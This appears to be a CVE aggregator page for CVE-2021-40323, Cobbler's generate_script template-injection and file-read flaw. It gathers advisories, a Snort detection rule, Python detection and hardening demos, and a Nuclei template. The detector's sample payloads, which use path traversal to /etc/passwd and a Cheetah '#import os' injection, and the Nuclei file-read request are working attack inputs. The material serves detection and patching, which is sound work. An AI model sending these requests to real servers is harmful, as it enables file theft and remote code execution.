CVE-2021-40323
published 2021-10-04
Priority P1 · 81 · critical · 9.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT · EPSS 88.48% (99.8th percentile)
Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cobbler_project | cobbler | <= 3.3.0 | — |
| cobbler_project | cobbler | >= 0 < 3.3.0 | 3.3.0 |
| cobbler_project | cobbler | >= 0 < d8f60bbf14a838c8c8a1dba98086b223e35fe70a | d8f60bbf14a838c8c8a1dba98086b223e35fe70a |
| cobbler_project | cobbler | >= 0 < 2.4.1-0ubuntu2+esm1 | 2.4.1-0ubuntu2+esm1 |
Detection & IOCs (extracted from sources)
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Clobber API XMLRPC Template Injection (CVE-2021-40323)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cobbler_api"; fast_pattern; startswith; http.request_body; content:"|3c|methodName|3e|generate|5f|script|3c 2f|methodName|3e|"; reference:url,github.com/cobbler/cobbler/issues/2795; reference:cve,2021-40323; classtype:web-application-attack; sid:2056380; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2024_10_01, cve CVE_2021_40323, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2024_10_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes
|3c|methodName|3e|generate|5f|script|3c 2f|methodName|3e|
- Exploit traffic is an HTTP POST to /cobbler_api with an XML-RPC body whose methodName is generate_script. Detect by matching the POST method, the URI /cobbler_api, and a request body containing the XML-encoded <methodName>generate_script</methodName> tag.
- The exploit calls the generate_script XML-RPC method with unsanitized parameters to achieve arbitrary file read (e.g., /etc/passwd) and, through the default Cheetah template engine, template-injection RCE.
- Successful exploitation responses are HTTP 200 with Content-Type text/xml and may contain /etc/passwd content matching patterns like 'root:.*:0', 'bin:.*:1', or 'nobody:.*:99'.
- The RCE path is log poisoning: Cheetah template directives sent through XML-RPC are written to the Cobbler logfile, which is then fed back through the template engine and executed server-side.
- Only Cobbler versions before 3.3.0 are affected. Red Hat Enterprise Linux 8 (rhn-tools:1.0/cobbler) is listed as Not Affected.
- The Snort/ET rule (sid:2056380) inspects the HTTP request body, so it only fires on plaintext HTTP; for an HTTPS-fronted Cobbler API it needs TLS decryption in front of the sensor (the rule's SSLDecrypt deployment tag).
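Detection logic for the criteria above, as an added example rather than the page's or Emerging Threats' code: it applies the ET rule's three on-the-wire tests (POST, /cobbler_api, generate_script methodName), then decodes the XML-RPC call with the standard library to judge the arguments themselves, which a byte-match rule cannot do. The scripts directory /var/lib/cobbler/scripts, the Cheetah-directive pattern and all sample requests are assumptions constructed for the demo.

```python
"""Inspect Cobbler XML-RPC requests for CVE-2021-40323 exploitation attempts."""
import posixpath
import re
import xmlrpc.client
from dataclasses import dataclass, field

SCRIPTS_DIR = "/var/lib/cobbler/scripts"          # assumed autoinstall scripts dir
METHOD_TAG = b"<methodName>generate_script</methodName>"  # body match from ET sid:2056380
# Cheetah directives (#import, #from, ...) or placeholders ($x) inside an argument
# are the log-poisoning payload the advisory describes (pattern is an assumption).
CHEETAH_RE = re.compile(r"#\s*(import|from|include|raw|def|set|echo|silent)\b|\$\{?\w")


@dataclass
class Finding:
    suspicious: bool
    reasons: list = field(default_factory=list)
    method: str = ""
    params: tuple = ()


def escapes_dir(base: str, name: str) -> bool:
    """True if base/name resolves outside base (absolute name or ../ traversal)."""
    target = posixpath.normpath(posixpath.join(base, name))
    return posixpath.commonpath([base, target]) != base


def inspect_request(method: str, uri: str, body: bytes) -> Finding:
    # Stage 1: the same three criteria as the ET rule
    if method != "POST" or not uri.startswith("/cobbler_api") or METHOD_TAG not in body:
        return Finding(False, ["not a generate_script call to /cobbler_api"])
    # Stage 2: decode the call and judge its arguments
    try:
        params, methodname = xmlrpc.client.loads(body.decode("utf-8", "replace"))
    except Exception as exc:  # malformed XML-RPC aimed at this method is itself worth a look
        return Finding(True, [f"generate_script body did not parse: {exc}"])
    finding = Finding(False, [], methodname, params)
    # generate_script(profile, system, name): the third argument names the template file
    if len(params) >= 3 and isinstance(params[2], str) and escapes_dir(SCRIPTS_DIR, params[2]):
        finding.reasons.append(f"script name {params[2]!r} resolves outside {SCRIPTS_DIR}")
    for value in (p for p in params if isinstance(p, str)):
        if CHEETAH_RE.search(value):
            finding.reasons.append(f"Cheetah directive in argument {value!r} (log poisoning)")
            break
    finding.suspicious = bool(finding.reasons)
    if not finding.suspicious:
        finding.reasons.append("generate_script call with in-tree script name")
    return finding


def xmlrpc_body(method: str, *params) -> bytes:
    """Build an XML-RPC request body the way a client library would (constructed sample)."""
    return xmlrpc.client.dumps(params, methodname=method).encode()


# Constructed sample traffic: a legitimate call, an absolute-path read, a traversal
# variant, a log-poisoning payload and an unrelated method on the same endpoint.
SAMPLES = {
    "legit": ("POST", "/cobbler_api", xmlrpc_body("generate_script", "webserver", "", "post_install.sh")),
    "absread": ("POST", "/cobbler_api", xmlrpc_body("generate_script", "webserver", "", "/etc/passwd")),
    "traversal": ("POST", "/cobbler_api", xmlrpc_body("generate_script", "webserver", "", "../../../../etc/passwd")),
    "poison": ("POST", "/cobbler_api", xmlrpc_body("generate_script", "webserver", "", "#import os\n$os.system('id')")),
    "other": ("POST", "/cobbler_api", xmlrpc_body("find_profile", {"name": "*"})),
}


def triage(samples=SAMPLES) -> dict:
    """Run every sample through inspect_request and return the findings by label."""
    return {label: inspect_request(*req) for label, req in samples.items()}


if __name__ == "__main__":
    for label, f in triage().items():
        print(f"{label:10s} suspicious={f.suspicious} {'; '.join(f.reasons)}")
```

Stage 1 alone would also fire on every legitimate generate_script call, which is why the rule is tagged as an exploit indicator rather than a confirmation; stage 2 is what separates an operator rendering post_install.sh from an attacker pointing the engine at /etc/passwd or seeding the log.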
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | | 4.0 | MEDIUM | |
| vendor_redhat | | 9.8 | CRITICAL | |
| vendor_ubuntu | | 4.0 | MEDIUM | |
Ubuntu
Cobbler vulnerabilities
vendor_ubuntu · 2023-11-13 · CVSS 4.0 · MEDIUM
Summary: Several security issues were fixed in Cobbler.
It was discovered that Cobbler did not properly handle user input, which
could result in an absolute path traversal. An attacker could possibly
use this issue to read arbitrary files. (CVE-2014-3225)
It was discovered that Cobbler did not properly handle user input, which
could result in command injection. An attacker could possibly use this
issue to execute arbitrary code with high privileges.
(CVE-2017-1000469, CVE-2021-45082)
It was discovered that Cobbler did not properly hide private functions in
a class. A remote attacker could possibly use this issue to gain high
privileges and upload files to an arbitrary location.
(CVE-2018-10931, CVE-2018-1000225, CVE-2018-1000226)
Nicolas Chatelain discov
Red Hat
cobbler: Arbitrary File Disclosure/Template Injection via generate_script RPC method
vendor_redhat · 2021-09-20 · CVSS 9.8 · CRITICAL · CWE-200
Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.
A flaw was found in cobbler. This flaw lies in the generate_script RPC method, which accepts unsanitized parameters. This flaw allows an attacker to read arbitrary files on the system as root. Further, the attacker could gain arbitrary code execution using template injection against the default Cheetah template engine, leading to the exposure of sensitive information or execution of arbitrary code. The highest threat from this vulnerability is to confidentiality and integrity.
Package: rhn-tools:1.0/cobbler (Red Hat Enterprise Linux 8) - Not affected
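The Red Hat description above reduces to one unsanitized file lookup whose result is fed to a template engine. The following added example (not Cobbler's code) shows that lookup in vulnerable and hardened form against a constructed directory tree. The function names, the fixture layout and the poisoned log line are assumptions made for the demo, and the Cheetah rendering stage is stubbed as a plain file read because the point is which file reaches the engine, not Cheetah itself.

```python
"""Vulnerable-vs-hardened sketch of a generate_script style file lookup."""
import os
import tempfile


class ScriptLookupError(Exception):
    pass


def vulnerable_script_path(scripts_dir: str, name: str) -> str:
    # os.path.join discards scripts_dir when name is absolute, and normpath
    # resolves "../" segments: any file the daemon can read is selectable.
    return os.path.normpath(os.path.join(scripts_dir, name))


def hardened_script_path(scripts_dir: str, name: str) -> str:
    # Accept only a bare file name, then confirm the resolved real path still
    # lives under the scripts directory and is a regular file.
    if not name or name != os.path.basename(name) or name.startswith("."):
        raise ScriptLookupError(f"invalid script name {name!r}")
    root = os.path.realpath(scripts_dir)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, target]) != root:
        raise ScriptLookupError(f"{name!r} resolves outside {scripts_dir}")
    if not os.path.isfile(target):
        raise ScriptLookupError(f"{name!r} is not a script file")
    return target


def render_script(path: str) -> str:
    # Stand-in for the Cheetah step: whatever file gets here is what the
    # template engine would evaluate, a poisoned log line included.
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def build_fixture() -> str:
    """Constructed layout: <root>/var/lib/cobbler/scripts plus a fake /etc/passwd and log."""
    root = tempfile.mkdtemp(prefix="cobbler-demo-")
    scripts = os.path.join(root, "var", "lib", "cobbler", "scripts")
    os.makedirs(scripts)
    with open(os.path.join(scripts, "post_install.sh"), "w") as fh:
        fh.write("#!/bin/sh\necho post-install\n")
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(root, "etc", "passwd"), "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
    log_dir = os.path.join(root, "var", "log", "cobbler")
    os.makedirs(log_dir)
    with open(os.path.join(log_dir, "cobbler.log"), "w") as fh:
        fh.write("generate_script name=#import os\n")  # constructed poisoned log line
    return root


def demo(root: str) -> dict:
    """Exercise both lookups against the fixture and return what each one served."""
    scripts = os.path.join(root, "var", "lib", "cobbler", "scripts")
    out = {}
    # Vulnerable lookup: traversal reaches the fake /etc/passwd and the poisoned log
    out["vuln_passwd"] = render_script(vulnerable_script_path(scripts, "../../../../etc/passwd"))
    out["vuln_log"] = render_script(vulnerable_script_path(scripts, "../../../log/cobbler/cobbler.log"))
    # Hardened lookup: the same names are refused, the legitimate script is served
    for name in ("../../../../etc/passwd", "../../../log/cobbler/cobbler.log", "/etc/passwd"):
        try:
            hardened_script_path(scripts, name)
            out[name] = "allowed"
        except ScriptLookupError as exc:
            out[name] = f"refused: {exc}"
    out["legit"] = render_script(hardened_script_path(scripts, "post_install.sh"))
    return out


if __name__ == "__main__":
    for key, value in demo(build_fixture()).items():
        print(f"{key}: {value.strip()!r}")
</```

The two fixes reinforce each other: the bare-name check stops the attacker from naming the log or /etc/passwd at all, and the realpath containment check catches anything a later symlink or a relaxed name policy might let through. Neither makes Cheetah safe on untrusted input, so the rendering step should still only ever see operator-managed templates from that directory.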
OSV
cobbler vulnerabilities
osv · 2023-11-13 · CVSS 4.0 · MEDIUM (indexed under CVE-2014-3225)
Same Ubuntu advisory text as the Ubuntu entry above.
OSV
Cobbler before 3.3.0 allows log poisoning
osv · 2021-10-05 · HIGH
Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.
GHSA
Cobbler before 3.3.0 allows log poisoning
ghsa · 2021-10-05 · HIGH · CWE-94
Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.
OSV
CVE-2021-40323: Cobbler before 3
osv · 2021-10-04
Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.
Suricata
ET WEB_SPECIFIC_APPS Clobber API XMLRPC Template Injection (CVE-2021-40323)
suricata · 2024-10-01 · CVSS 9.8 · CRITICAL
Rule: sid:2056380; the full rule text is quoted under Detection & IOCs above.
Nuclei
Cobbler <3.3.0 - Remote Code Execution
nuclei · CVSS 9.8 · CRITICAL
Template:

```yaml
# The page extract had the XML tags stripped; only the method names, parameter
# values, matchers and extractor below are quoted from the indexed template, and
# the <methodCall> envelopes are reconstructed around them from the XML-RPC format.
id: CVE-2021-40323

info:
  name: Cobbler <3.3.0 - Remote Code Execution
  severity: critical

http:
  - raw:
      - |
        POST {{BaseURL}}/cobbler_api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0"?>
        <methodCall>
          <methodName>find_profile</methodName>
          <params>
            <param><value><struct><member>
              <name>name</name>
              <value><string>*</string></value>
            </member></struct></value></param>
          </params>
        </methodCall>

      - |
        POST {{BaseURL}}/cobbler_api HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0"?>
        <methodCall>
          <methodName>generate_script</methodName>
          <params>
            <param><value><string>{{profile}}</string></value></param>
            <param><value><string></string></value></param>
            <param><value><string>/etc/passwd</string></value></param>
          </params>
        </methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'text/xml'
      - type: regex
        regex:
          - "root:.*:0"
          - "bin:.*:1"
          - "nobody:.*:99"
        condition: or
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        name: profile
        group: 1
        regex:
          - '<string>(.*?)</string>'
        internal: true
# digest: 4a0a00473045022100865bb5cde116ddfcc714ad3b3635fc519fc62fc4fbd1fa5249f8e0fc0029477e022010804267594f2f48ef48c67dc5e7d555bd5ad528576e6e904a811c8727a75b7b:922c64590222798bb761d5b6d8e72950
```
No writeups or analysis indexed.
Published: 2021-10-04